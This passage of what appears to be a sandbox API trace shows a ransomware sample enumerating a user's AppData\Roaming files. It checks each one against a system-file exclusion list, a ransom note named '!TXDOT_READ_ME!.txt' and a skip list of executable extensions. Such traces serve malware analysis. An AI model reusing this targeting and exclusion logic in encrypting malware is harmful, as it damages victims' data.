lpSystemTime=0x552f188) returned 1 [0072.514] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.514] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.528] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.528] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp" [0072.528] SetEvent (hEvent=0x408) returned 1 [0072.529] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3606c4c0, ftCreationTime.dwHighDateTime=0x1d5ef90, ftLastAccessTime.dwLowDateTime=0xd600a6e0, ftLastAccessTime.dwHighDateTime=0x1d5e99a, ftLastWriteTime.dwLowDateTime=0xd600a6e0, ftLastWriteTime.dwHighDateTime=0x1d5e99a, nFileSizeHigh=0x0, nFileSizeLow=0x222a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="U9jIHqltNvJBusuu8M.m4a", cAlternateFileName="U9JIHQ~1.M4A")) returned 1 [0072.529] StrCmpW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2=".") returned 1 [0072.529] StrCmpW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2="..") returned 1 [0072.529] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.529] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.529] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="U9jIHqltNvJBusuu8M.m4a", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a" [0072.529] PathFindExtensionW (pszPath="U9jIHqltNvJBusuu8M.m4a") returned=".m4a" [0072.529] StrCmpW (psz1=".m4a", psz2=".txd0t") returned -1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2="bootsect.bak") returned 1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2="iconcache.db") returned 1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2="thumbs.db") returned 1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2=" ransomware ") returned 1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2=" ransom ") returned 1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2="debug.txt") returned 1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2="boot.ini") returned 1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2="desktop.ini") returned 1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2="autorun.inf") returned 1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2="ntuser.dat") returned 1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2="ntldr") returned 1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2="ntdetect.com") returned 1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2="bootfont.bin") returned 1 [0072.529] StrCmpIW (psz1="U9jIHqltNvJBusuu8M.m4a", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.529] PathFindExtensionW (pszPath="U9jIHqltNvJBusuu8M.m4a") returned=".m4a" [0072.529] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".m4a") returned 0x0 [0072.529] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.529] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.529] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.538] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.538] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U9jIHqltNvJBusuu8M.m4a" [0072.538] SetEvent (hEvent=0x3fc) returned 1 [0072.538] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa572ba20, ftCreationTime.dwHighDateTime=0x1d5f0f9, ftLastAccessTime.dwLowDateTime=0xcfd02e20, ftLastAccessTime.dwHighDateTime=0x1d5e419, ftLastWriteTime.dwLowDateTime=0xcfd02e20, ftLastWriteTime.dwHighDateTime=0x1d5e419, nFileSizeHigh=0x0, nFileSizeLow=0x1618f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="uBqsl.png", cAlternateFileName="")) returned 1 [0072.538] StrCmpW (psz1="uBqsl.png", psz2=".") returned 1 [0072.538] StrCmpW (psz1="uBqsl.png", psz2="..") returned 1 [0072.538] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.538] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.538] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="uBqsl.png", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png" [0072.538] PathFindExtensionW (pszPath="uBqsl.png") returned=".png" [0072.538] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0072.538] StrCmpIW (psz1="uBqsl.png", psz2="bootsect.bak") returned 1 [0072.538] StrCmpIW (psz1="uBqsl.png", psz2="iconcache.db") returned 1 [0072.539] StrCmpIW (psz1="uBqsl.png", psz2="thumbs.db") returned 1 [0072.539] StrCmpIW (psz1="uBqsl.png", psz2=" ransomware ") returned 1 [0072.539] StrCmpIW (psz1="uBqsl.png", psz2=" ransom ") returned 1 [0072.539] StrCmpIW (psz1="uBqsl.png", psz2="debug.txt") returned 1 [0072.539] StrCmpIW (psz1="uBqsl.png", psz2="boot.ini") returned 1 [0072.539] StrCmpIW (psz1="uBqsl.png", psz2="desktop.ini") returned 1 [0072.539] StrCmpIW (psz1="uBqsl.png", psz2="autorun.inf") returned 1 [0072.539] StrCmpIW (psz1="uBqsl.png", psz2="ntuser.dat") returned 1 [0072.539] StrCmpIW (psz1="uBqsl.png", psz2="ntldr") returned 1 [0072.539] StrCmpIW (psz1="uBqsl.png", psz2="ntdetect.com") returned 1 [0072.539] StrCmpIW (psz1="uBqsl.png", psz2="bootfont.bin") returned 1 [0072.539] StrCmpIW (psz1="uBqsl.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.539] PathFindExtensionW (pszPath="uBqsl.png") returned=".png" [0072.539] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0072.539] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.539] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.539] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.548] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.549] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png" [0072.549] SetEvent (hEvent=0x408) returned 1 [0072.549] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9667b070, ftCreationTime.dwHighDateTime=0x1d5edbc, ftLastAccessTime.dwLowDateTime=0x56e267f0, ftLastAccessTime.dwHighDateTime=0x1d5e25a, ftLastWriteTime.dwLowDateTime=0x56e267f0, ftLastWriteTime.dwHighDateTime=0x1d5e25a, nFileSizeHigh=0x0, nFileSizeLow=0x10c1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="UFfU-NQWoB7XyHy.mp3", cAlternateFileName="UFFU-N~1.MP3")) returned 1 [0072.549] StrCmpW (psz1="UFfU-NQWoB7XyHy.mp3", psz2=".") returned 1 [0072.549] StrCmpW (psz1="UFfU-NQWoB7XyHy.mp3", psz2="..") returned 1 [0072.549] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.549] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.549] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="UFfU-NQWoB7XyHy.mp3", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3" [0072.549] PathFindExtensionW (pszPath="UFfU-NQWoB7XyHy.mp3") returned=".mp3" [0072.549] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0072.549] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2="bootsect.bak") returned 1 [0072.549] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2="iconcache.db") returned 1 [0072.549] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2="thumbs.db") returned 1 [0072.549] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2=" ransomware ") returned 1 [0072.549] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2=" ransom ") returned 1 [0072.549] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2="debug.txt") returned 1 [0072.549] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2="boot.ini") returned 1 [0072.549] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2="desktop.ini") returned 1 [0072.549] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2="autorun.inf") returned 1 [0072.550] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2="ntuser.dat") returned 1 [0072.550] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2="ntldr") returned 1 [0072.550] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2="ntdetect.com") returned 1 [0072.550] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2="bootfont.bin") returned 1 [0072.550] StrCmpIW (psz1="UFfU-NQWoB7XyHy.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.550] PathFindExtensionW (pszPath="UFfU-NQWoB7XyHy.mp3") returned=".mp3" [0072.550] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0072.550] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.550] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.550] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.604] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.604] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\UFfU-NQWoB7XyHy.mp3" [0072.604] SetEvent (hEvent=0x3fc) returned 1 [0072.607] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c250f10, ftCreationTime.dwHighDateTime=0x1d5e8f7, ftLastAccessTime.dwLowDateTime=0xbec39840, ftLastAccessTime.dwHighDateTime=0x1d5ea15, ftLastWriteTime.dwLowDateTime=0xbec39840, ftLastWriteTime.dwHighDateTime=0x1d5ea15, nFileSizeHigh=0x0, nFileSizeLow=0x14923, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="wL6CtWVaL-45s.odp", cAlternateFileName="WL6CTW~1.ODP")) returned 1 [0072.607] StrCmpW (psz1="wL6CtWVaL-45s.odp", psz2=".") returned 1 [0072.607] StrCmpW (psz1="wL6CtWVaL-45s.odp", psz2="..") returned 1 [0072.607] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.607] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.612] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="wL6CtWVaL-45s.odp", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp" [0072.612] PathFindExtensionW (pszPath="wL6CtWVaL-45s.odp") returned=".odp" [0072.612] StrCmpW (psz1=".odp", psz2=".txd0t") returned -1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2="bootsect.bak") returned 1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2="iconcache.db") returned 1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2="thumbs.db") returned 1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2=" ransomware ") returned 1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2=" ransom ") returned 1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2="debug.txt") returned 1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2="boot.ini") returned 1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2="desktop.ini") returned 1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2="autorun.inf") returned 1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2="ntuser.dat") returned 1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2="ntldr") returned 1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2="ntdetect.com") returned 1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2="bootfont.bin") returned 1 [0072.612] StrCmpIW (psz1="wL6CtWVaL-45s.odp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.612] PathFindExtensionW (pszPath="wL6CtWVaL-45s.odp") returned=".odp" [0072.612] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".odp") returned 0x0 [0072.612] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.612] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.612] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.612] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.612] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp" [0072.612] SetEvent (hEvent=0x3fc) returned 1 [0072.616] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4d4ae90, ftCreationTime.dwHighDateTime=0x1d5ec00, ftLastAccessTime.dwLowDateTime=0xd8987d80, ftLastAccessTime.dwHighDateTime=0x1d5ee34, ftLastWriteTime.dwLowDateTime=0xd8987d80, ftLastWriteTime.dwHighDateTime=0x1d5ee34, nFileSizeHigh=0x0, nFileSizeLow=0x8a81, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="XqhhUYjJL0U.rtf", cAlternateFileName="XQHHUY~1.RTF")) returned 1 [0072.616] StrCmpW (psz1="XqhhUYjJL0U.rtf", psz2=".") returned 1 [0072.616] StrCmpW (psz1="XqhhUYjJL0U.rtf", psz2="..") returned 1 [0072.617] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.617] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.617] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="XqhhUYjJL0U.rtf", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf" [0072.617] PathFindExtensionW (pszPath="XqhhUYjJL0U.rtf") returned=".rtf" [0072.617] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2="bootsect.bak") returned 1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2="iconcache.db") returned 1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2="thumbs.db") returned 1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2=" ransomware ") returned 1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2=" ransom ") returned 1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2="debug.txt") returned 1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2="boot.ini") returned 1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2="desktop.ini") returned 1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2="autorun.inf") returned 1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2="ntuser.dat") returned 1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2="ntldr") returned 1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2="ntdetect.com") returned 1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2="bootfont.bin") returned 1 [0072.617] StrCmpIW (psz1="XqhhUYjJL0U.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.617] PathFindExtensionW (pszPath="XqhhUYjJL0U.rtf") returned=".rtf" [0072.617] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0072.618] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.618] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.622] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.622] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.622] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf" [0072.622] SetEvent (hEvent=0x3fc) returned 1 [0072.625] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c144d0, ftCreationTime.dwHighDateTime=0x1d5e507, ftLastAccessTime.dwLowDateTime=0x74880b60, ftLastAccessTime.dwHighDateTime=0x1d5ee68, ftLastWriteTime.dwLowDateTime=0x74880b60, ftLastWriteTime.dwHighDateTime=0x1d5ee68, nFileSizeHigh=0x0, nFileSizeLow=0x11697, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="YDXeffFC99vGn.mp3", cAlternateFileName="YDXEFF~1.MP3")) returned 1 [0072.625] StrCmpW (psz1="YDXeffFC99vGn.mp3", psz2=".") returned 1 [0072.625] StrCmpW (psz1="YDXeffFC99vGn.mp3", psz2="..") returned 1 [0072.625] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.625] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.625] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="YDXeffFC99vGn.mp3", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3" [0072.625] PathFindExtensionW (pszPath="YDXeffFC99vGn.mp3") returned=".mp3" [0072.625] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0072.625] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2="bootsect.bak") returned 1 [0072.625] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2="iconcache.db") returned 1 [0072.625] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2="thumbs.db") returned 1 [0072.625] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2=" ransomware ") returned 1 [0072.625] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2=" ransom ") returned 1 [0072.626] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2="debug.txt") returned 1 [0072.626] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2="boot.ini") returned 1 [0072.626] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2="desktop.ini") returned 1 [0072.626] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2="autorun.inf") returned 1 [0072.626] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2="ntuser.dat") returned 1 [0072.629] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2="ntldr") returned 1 [0072.629] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2="ntdetect.com") returned 1 [0072.629] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2="bootfont.bin") returned 1 [0072.629] StrCmpIW (psz1="YDXeffFC99vGn.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.629] PathFindExtensionW (pszPath="YDXeffFC99vGn.mp3") returned=".mp3" [0072.629] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0072.629] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.629] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.630] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.630] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.630] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3" [0072.630] SetEvent (hEvent=0x3fc) returned 1 [0072.633] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, 